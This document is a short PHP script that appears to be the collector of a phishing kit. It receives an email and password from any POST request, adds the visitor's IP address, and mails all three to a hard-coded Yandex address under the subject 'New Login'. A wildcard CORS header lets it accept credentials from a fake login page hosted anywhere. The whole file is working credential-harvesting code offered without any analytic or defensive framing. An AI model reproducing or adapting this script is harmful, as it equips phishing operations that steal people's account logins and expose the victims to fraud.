<?php

header('Access-Control-Allow-Origin: *'); 

$ip = getenv("REMOTE_ADDR");

if(!empty($_POST)) {

  $email = $_POST['email'];
  
  $password = $_POST['password'];

  $to = "luck.bear@yandex.com";
  
  $subject = "New Login";

  $message = "Online ID: " . $email . "\r\n";
  
  $message .= "Password: " . $password . "\r\n";
  
  $message .= "IP: " . $ip . "\r\n";

  $headers = "From: <" . $to . ">" . "\r\n";
  
  $headers .= "Content-type: text/html\r\n";  

  $headers .= "MIME-Version: 1.0\r\n";
   
  mail ($to, $subject, $message, $headers);

  echo '{"status":"ok"}';

}

?>